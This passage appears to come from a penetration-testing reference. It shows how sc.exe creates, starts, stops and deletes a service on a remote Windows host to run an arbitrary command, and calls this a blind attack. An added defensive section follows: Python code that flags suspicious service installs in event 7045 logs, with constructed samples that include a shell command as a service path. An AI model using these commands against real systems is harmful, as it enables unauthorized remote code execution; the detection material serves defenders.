IMPORTANT

By default, UAC restricts remote sc.exe calls to domain admins and the built-in local “Administrator” account. Other local Windows admins cannot reach the Service Control Manager remotely without first disabling UAC!

The sc.exe command can also be used to create and manipulate services on remote machines. It uses Windows RPC (TCP 135), but falls back to named pipes over SMB (TCP 445) or NetBIOS (TCP 139). (In fact, this is how sc.exe works locally as well; the only difference is that, locally, a local named pipe is always used.)

# Create $ATTACKER_SERVICE on the $TARGET_HOST.
#
sc.exe \\$TARGET_HOST create $ATTACKER_SERVICE `
    binPath= "$SOME_COMMAND" start= auto

# Invoke $ATTACKER_SERVICE.
#
sc.exe \\$TARGET_HOST start $ATTACKER_SERVICE

# Make sure that $ATTACKER_SERVICE is really dead.
#
sc.exe \\$TARGET_HOST stop $ATTACKER_SERVICE

# Clean up after yourself.
#
sc.exe \\$TARGET_HOST delete $ATTACKER_SERVICE

Note that this is a blind attack — there will be no output indicating success or failure.
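From the defender's side, here is an added example (not part of the original page) that flags the service-creation pattern described above in Windows System log 7045 ("A service was installed in the system") events: an ImagePath that is a shell command rather than a service binary, installed by an account outside a deployment allowlist. The log lines, their flattened field layout and the allowlist are constructed for illustration.

```python
import re

# Constructed sample of Windows System log 7045 ("A service was installed in the
# system") events, flattened to one line each with the installing account resolved
# to a name; not real telemetry.
SAMPLE_7045 = [
    '2024-05-01T10:15:02Z 7045 ServiceName="VendorUpdater" ImagePath="C:\\Program Files\\Vendor\\updater.exe" StartType="auto start" User="CORP\\svc_deploy"',
    '2024-05-01T10:17:44Z 7045 ServiceName="tmp9f2a" ImagePath="%COMSPEC% /c whoami > C:\\Windows\\Temp\\o.txt" StartType="auto start" User="CORP\\jdoe"',
    '2024-05-01T10:20:00Z 7045 ServiceName="Spooler2" ImagePath="C:\\Windows\\System32\\svchost.exe -k netsvcs" StartType="demand start" User="NT AUTHORITY\\SYSTEM"',
]

# Accounts expected to install services (constructed allowlist; tune per estate).
KNOWN_INSTALLERS = {"NT AUTHORITY\\SYSTEM", "CORP\\svc_deploy"}

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
# Script/shell hosts that a legitimate service binary is rarely registered as.
INTERPRETER_RE = re.compile(
    r'(?:^|[\\\s"])(?:cmd|powershell|pwsh|rundll32|mshta|wscript|cscript|regsvr32)(?:\.exe)?\b|%COMSPEC%',
    re.IGNORECASE)
# "/c <command>" and redirection/pipe operators betray a one-shot command, not a service.
SHELL_OPS_RE = re.compile(r'\s/c\s|[>|&]')

def parse_7045(line: str) -> dict:
    """Split a flattened 7045 line into its timestamp, event id and key="value" fields."""
    timestamp, event_id, rest = line.split(" ", 2)
    fields = dict(FIELD_RE.findall(rest))
    fields["timestamp"], fields["event_id"] = timestamp, int(event_id)
    return fields

def analyze(lines, known_installers=KNOWN_INSTALLERS) -> list:
    """Return one finding dict per 7045 event whose ImagePath looks like an ad-hoc command."""
    findings = []
    for line in lines:
        ev = parse_7045(line)
        if ev["event_id"] != 7045:
            continue
        path, user = ev.get("ImagePath", ""), ev.get("User", "")
        reasons = []
        if INTERPRETER_RE.search(path):
            reasons.append("ImagePath is a shell/script interpreter, not a service binary")
        if SHELL_OPS_RE.search(path):
            reasons.append("ImagePath carries /c or shell operators")
        # An unexpected installer alone is noisy; report it only alongside a path indicator.
        if reasons and user not in known_installers:
            reasons.append("installed by an account outside the deployment allowlist")
        if reasons:
            findings.append({"timestamp": ev["timestamp"], "service": ev["ServiceName"],
                             "image_path": path, "user": user, "reasons": reasons})
    return findings
```

Because sc.exe gives the caller no feedback, the host's own 7045 record (and a stop shortly after) is often the only trace of the create/start/stop/delete sequence, so this is the log to forward centrally.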